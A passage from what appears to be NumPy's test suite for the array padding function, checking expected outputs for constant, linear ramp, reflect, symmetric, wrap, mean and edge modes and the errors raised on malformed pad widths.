[ 1, 1, 1, 1, 1, 1, 1, 1, 1]]
)
assert_allclose(test, expected)
def test_check_constant_float2(self):
# If input array is float, and constant_values are float, the dtype of
# the array to be padded is kept - here retaining the float constants
arr = np.arange(30).reshape(5, 6)
arr_float = arr.astype(np.float64)
test = pad(arr_float, ((1, 2), (1, 2)), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 0. , 1. , 2. , 3. , 4. , 5. , 1.1, 1.1],
[ 1.1, 6. , 7. , 8. , 9. , 10. , 11. , 1.1, 1.1],
[ 1.1, 12. , 13. , 14. , 15. , 16. , 17. , 1.1, 1.1],
[ 1.1, 18. , 19. , 20. , 21. , 22. , 23. , 1.1, 1.1],
[ 1.1, 24. , 25. , 26. , 27. , 28. , 29. , 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1],
[ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1]]
)
assert_allclose(test, expected)
def test_check_constant_float3(self):
a = np.arange(100, dtype=float)
a = pad(a, (25, 20), 'constant', constant_values=(-1.1, -1.2))
b = np.array(
[-1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
-1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1, -1.1,
-1.1, -1.1, -1.1, -1.1, -1.1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
-1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2,
-1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2, -1.2]
)
assert_allclose(a, b)
def test_check_constant_odd_pad_amount(self):
arr = np.arange(30).reshape(5, 6)
test = pad(arr, ((1,), (2,)), mode='constant',
constant_values=3)
expected = np.array(
[[ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[ 3, 3, 0, 1, 2, 3, 4, 5, 3, 3],
[ 3, 3, 6, 7, 8, 9, 10, 11, 3, 3],
[ 3, 3, 12, 13, 14, 15, 16, 17, 3, 3],
[ 3, 3, 18, 19, 20, 21, 22, 23, 3, 3],
[ 3, 3, 24, 25, 26, 27, 28, 29, 3, 3],
[ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]]
)
assert_allclose(test, expected)
def test_check_constant_pad_2d(self):
arr = np.arange(4).reshape(2, 2)
test = np.lib.pad(arr, ((1, 2), (1, 3)), mode='constant',
constant_values=((1, 2), (3, 4)))
expected = np.array(
[[3, 1, 1, 4, 4, 4],
[3, 0, 1, 4, 4, 4],
[3, 2, 3, 4, 4, 4],
[3, 2, 2, 4, 4, 4],
[3, 2, 2, 4, 4, 4]]
)
assert_allclose(test, expected)
class TestLinearRamp(TestCase):
def test_check_simple(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'linear_ramp', end_values=(4, 5))
b = np.array(
[4.00, 3.84, 3.68, 3.52, 3.36, 3.20, 3.04, 2.88, 2.72, 2.56,
2.40, 2.24, 2.08, 1.92, 1.76, 1.60, 1.44, 1.28, 1.12, 0.96,
0.80, 0.64, 0.48, 0.32, 0.16,
0.00, 1.00, 2.00, 3.00, 4.00, 5.00, 6.00, 7.00, 8.00, 9.00,
10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0,
20.0, 21.0, 22.0, 23.0, 24.0, 25.0, 26.0, 27.0, 28.0, 29.0,
30.0, 31.0, 32.0, 33.0, 34.0, 35.0, 36.0, 37.0, 38.0, 39.0,
40.0, 41.0, 42.0, 43.0, 44.0, 45.0, 46.0, 47.0, 48.0, 49.0,
50.0, 51.0, 52.0, 53.0, 54.0, 55.0, 56.0, 57.0, 58.0, 59.0,
60.0, 61.0, 62.0, 63.0, 64.0, 65.0, 66.0, 67.0, 68.0, 69.0,
70.0, 71.0, 72.0, 73.0, 74.0, 75.0, 76.0, 77.0, 78.0, 79.0,
80.0, 81.0, 82.0, 83.0, 84.0, 85.0, 86.0, 87.0, 88.0, 89.0,
90.0, 91.0, 92.0, 93.0, 94.0, 95.0, 96.0, 97.0, 98.0, 99.0,
94.3, 89.6, 84.9, 80.2, 75.5, 70.8, 66.1, 61.4, 56.7, 52.0,
47.3, 42.6, 37.9, 33.2, 28.5, 23.8, 19.1, 14.4, 9.7, 5.]
)
assert_allclose(a, b, rtol=1e-5, atol=1e-5)
def test_check_2d(self):
arr = np.arange(20).reshape(4, 5).astype(np.float64)
test = pad(arr, (2, 2), mode='linear_ramp', end_values=(0, 0))
expected = np.array(
[[0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0.5, 1., 1.5, 2., 1., 0.],
[0., 0., 0., 1., 2., 3., 4., 2., 0.],
[0., 2.5, 5., 6., 7., 8., 9., 4.5, 0.],
[0., 5., 10., 11., 12., 13., 14., 7., 0.],
[0., 7.5, 15., 16., 17., 18., 19., 9.5, 0.],
[0., 3.75, 7.5, 8., 8.5, 9., 9.5, 4.75, 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0.]])
assert_allclose(test, expected)
class TestReflect(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'reflect')
b = np.array(
[25, 24, 23, 22, 21, 20, 19, 18, 17, 16,
15, 14, 13, 12, 11, 10, 9, 8, 7, 6,
5, 4, 3, 2, 1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
98, 97, 96, 95, 94, 93, 92, 91, 90, 89,
88, 87, 86, 85, 84, 83, 82, 81, 80, 79]
)
assert_array_equal(a, b)
def test_check_odd_method(self):
a = np.arange(100)
a = pad(a, (25, 20), 'reflect', reflect_type='odd')
b = np.array(
[-25, -24, -23, -22, -21, -20, -19, -18, -17, -16,
-15, -14, -13, -12, -11, -10, -9, -8, -7, -6,
-5, -4, -3, -2, -1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
100, 101, 102, 103, 104, 105, 106, 107, 108, 109,
110, 111, 112, 113, 114, 115, 116, 117, 118, 119]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'reflect')
b = np.array(
[[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_shape(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'reflect')
b = np.array(
[[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 2, 'reflect')
b = np.array([3, 2, 1, 2, 3, 2, 1])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 3, 'reflect')
b = np.array([2, 3, 2, 1, 2, 3, 2, 1, 2])
assert_array_equal(a, b)
def test_check_03(self):
a = pad([1, 2, 3], 4, 'reflect')
b = np.array([1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3])
assert_array_equal(a, b)
def test_check_padding_an_empty_array(self):
a = pad(np.zeros((0, 3)), ((0,), (1,)), mode='reflect')
b = np.zeros((0, 5))
assert_array_equal(a, b)
class TestSymmetric(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'symmetric')
b = np.array(
[24, 23, 22, 21, 20, 19, 18, 17, 16, 15,
14, 13, 12, 11, 10, 9, 8, 7, 6, 5,
4, 3, 2, 1, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 98, 97, 96, 95, 94, 93, 92, 91, 90,
89, 88, 87, 86, 85, 84, 83, 82, 81, 80]
)
assert_array_equal(a, b)
def test_check_odd_method(self):
a = np.arange(100)
a = pad(a, (25, 20), 'symmetric', reflect_type='odd')
b = np.array(
[-24, -23, -22, -21, -20, -19, -18, -17, -16, -15,
-14, -13, -12, -11, -10, -9, -8, -7, -6, -5,
-4, -3, -2, -1, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 100, 101, 102, 103, 104, 105, 106, 107, 108,
109, 110, 111, 112, 113, 114, 115, 116, 117, 118]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'symmetric')
b = np.array(
[[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6]]
)
assert_array_equal(a, b)
def test_check_large_pad_odd(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'symmetric', reflect_type='odd')
b = np.array(
[[-3, -2, -2, -1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6],
[-3, -2, -2, -1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6],
[-1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8],
[-1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8],
[ 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10],
[ 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10],
[ 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12],
[ 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12],
[ 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14],
[ 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14],
[ 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16],
[ 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16],
[ 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16, 17, 18, 18],
[ 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16, 17, 18, 18]]
)
assert_array_equal(a, b)
def test_check_shape(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'symmetric')
b = np.array(
[[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 2, 'symmetric')
b = np.array([2, 1, 1, 2, 3, 3, 2])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 3, 'symmetric')
b = np.array([3, 2, 1, 1, 2, 3, 3, 2, 1])
assert_array_equal(a, b)
def test_check_03(self):
a = pad([1, 2, 3], 6, 'symmetric')
b = np.array([1, 2, 3, 3, 2, 1, 1, 2, 3, 3, 2, 1, 1, 2, 3])
assert_array_equal(a, b)
class TestWrap(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'wrap')
b = np.array(
[75, 76, 77, 78, 79, 80, 81, 82, 83, 84,
85, 86, 87, 88, 89, 90, 91, 92, 93, 94,
95, 96, 97, 98, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = np.arange(12)
a = np.reshape(a, (3, 4))
a = pad(a, (10, 12), 'wrap')
b = np.array(
[[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 3, 'wrap')
b = np.array([1, 2, 3, 1, 2, 3, 1, 2, 3])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 4, 'wrap')
b = np.array([3, 1, 2, 3, 1, 2, 3, 1, 2, 3, 1])
assert_array_equal(a, b)
class TestStatLen(TestCase):
def test_check_simple(self):
a = np.arange(30)
a = np.reshape(a, (6, 5))
a = pad(a, ((2, 3), (3, 2)), mode='mean', stat_length=(3,))
b = np.array(
[[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[1, 1, 1, 0, 1, 2, 3, 4, 3, 3],
[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[11, 11, 11, 10, 11, 12, 13, 14, 13, 13],
[16, 16, 16, 15, 16, 17, 18, 19, 18, 18],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[26, 26, 26, 25, 26, 27, 28, 29, 28, 28],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23]]
)
assert_array_equal(a, b)
class TestEdge(TestCase):
def test_check_simple(self):
a = np.arange(12)
a = np.reshape(a, (4, 3))
a = pad(a, ((2, 3), (3, 2)), 'edge')
b = np.array(
[[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[3, 3, 3, 3, 4, 5, 5, 5],
[6, 6, 6, 6, 7, 8, 8, 8],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11]]
)
assert_array_equal(a, b)
def test_check_width_shape_1_2(self):
# Check a pad_width of the form ((1, 2),).
# Regression test for issue gh-7808.
a = np.array([1, 2, 3])
padded = pad(a, ((1, 2),), 'edge')
expected = np.array([1, 1, 2, 3, 3, 3])
assert_array_equal(padded, expected)
a = np.array([[1, 2, 3], [4, 5, 6]])
padded = pad(a, ((1, 2),), 'edge')
expected = pad(a, ((1, 2), (1, 2)), 'edge')
assert_array_equal(padded, expected)
a = np.arange(24).reshape(2, 3, 4)
padded = pad(a, ((1, 2),), 'edge')
expected = pad(a, ((1, 2), (1, 2), (1, 2)), 'edge')
assert_array_equal(padded, expected)
class TestZeroPadWidth(TestCase):
def test_zero_pad_width(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
for pad_width in (0, (0, 0), ((0, 0), (0, 0))):
assert_array_equal(arr, pad(arr, pad_width, mode='constant'))
class TestLegacyVectorFunction(TestCase):
def test_legacy_vector_functionality(self):
def _padwithtens(vector, pad_width, iaxis, kwargs):
vector[:pad_width[0]] = 10
vector[-pad_width[1]:] = 10
return vector
a = np.arange(6).reshape(2, 3)
a = pad(a, 2, _padwithtens)
b = np.array(
[[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 0, 1, 2, 10, 10],
[10, 10, 3, 4, 5, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10]]
)
assert_array_equal(a, b)
class TestNdarrayPadWidth(TestCase):
def test_check_simple(self):
a = np.arange(12)
a = np.reshape(a, (4, 3))
a = pad(a, np.array(((2, 3), (3, 2))), 'edge')
b = np.array(
[[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[3, 3, 3, 3, 4, 5, 5, 5],
[6, 6, 6, 6, 7, 8, 8, 8],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11]]
)
assert_array_equal(a, b)
class TestUnicodeInput(TestCase):
def test_unicode_mode(self):
constant_mode = u'constant'
a = np.pad([1], 2, mode=constant_mode)
b = np.array([0, 0, 1, 0, 0])
assert_array_equal(a, b)
class ValueError1(TestCase):
def test_check_simple(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((2, 3), (3, 2), (4, 5)),
**kwargs)
def test_check_negative_stat_length(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(-3, ))
assert_raises(ValueError, pad, arr, ((2, 3), (3, 2)),
**kwargs)
def test_check_negative_pad_width(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
**kwargs)
def test_check_empty_array(self):
assert_raises(ValueError, pad, [], 4, mode='reflect')
assert_raises(ValueError, pad, np.ndarray(0), 4, mode='reflect')
assert_raises(ValueError, pad, np.zeros((0, 3)), ((1,), (0,)),
mode='reflect')
class ValueError2(TestCase):
def test_check_negative_pad_amount(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
**kwargs)
class ValueError3(TestCase):
def test_check_kwarg_not_allowed(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, 4, mode='mean',
reflect_type='odd')
def test_mode_not_set(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(TypeError, pad, arr, 4)
def test_malformed_pad_amount(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, (4, 5, 6, 7), mode='constant')
def test_malformed_pad_amount2(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, ((3, 4, 5), (0, 1, 2)),
mode='constant')
def test_pad_too_many_axes(self):
arr = np.arange(30).reshape(5, 6)
# Attempt to pad using a 3D array equivalent
bad_shape = (((3,), (4,), (5,)), ((0,), (1,), (2,)))
assert_raises(ValueError, pad, arr, bad_shape,
mode='constant')
class TypeError1(TestCase):
def test_float(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, ((-2.1, 3), (3, 2)))
assert_raises(TypeError, pad, arr, np.array(((-2.1, 3), (3, 2))))
def test_str(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, 'foo')
assert_raises(TypeError, pad, arr, np.array('foo'))
def test_object(self):
class FooBar(object):
pass
arr = np.arange(30)
assert_raises(TypeError, pad, arr, FooBar())
def test_complex(self):
